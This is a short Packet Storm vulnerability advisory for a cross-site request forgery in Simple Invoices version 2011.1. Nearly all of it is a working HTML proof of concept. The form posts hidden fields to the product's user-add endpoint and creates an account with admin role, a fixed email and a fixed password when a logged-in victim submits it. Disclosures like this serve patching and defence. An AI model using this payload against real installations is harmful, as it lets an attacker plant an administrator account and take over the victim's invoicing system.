Simple Invoice 2011.1 Cross Site Request Forgery

2015-05-20T00:00:00
ID PACKETSTORM:131989
Type packetstorm
Reporter Provensec
Modified 2015-05-20T00:00:00

Description

                                        
                                            `# Affected software: simple invoice  
# Type of vulnerability:adding admin user via csrf  
# URL:simpleinvoices.org  
# Discovered by: provensec  
# Website: provensec.com  
  
#version:2011.1  
# Proof of concept  
  
<html>  
  
<body>  
<form action="  
http://demo.simpleinvoices.org/index.php?module=user&view=add"  
method="POST">  
<input type="hidden" name="email" value="aaaa@gmail.com" />  
<input type="hidden" name="role" value="1" />  
<input type="hidden" name="password_field" value="lalala123@"  
/>  
<input type="hidden" name="enabled" value="1" />  
<input type="hidden" name="submit" value="Insert User" />  
<input type="hidden" name="op" value="insert_user" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`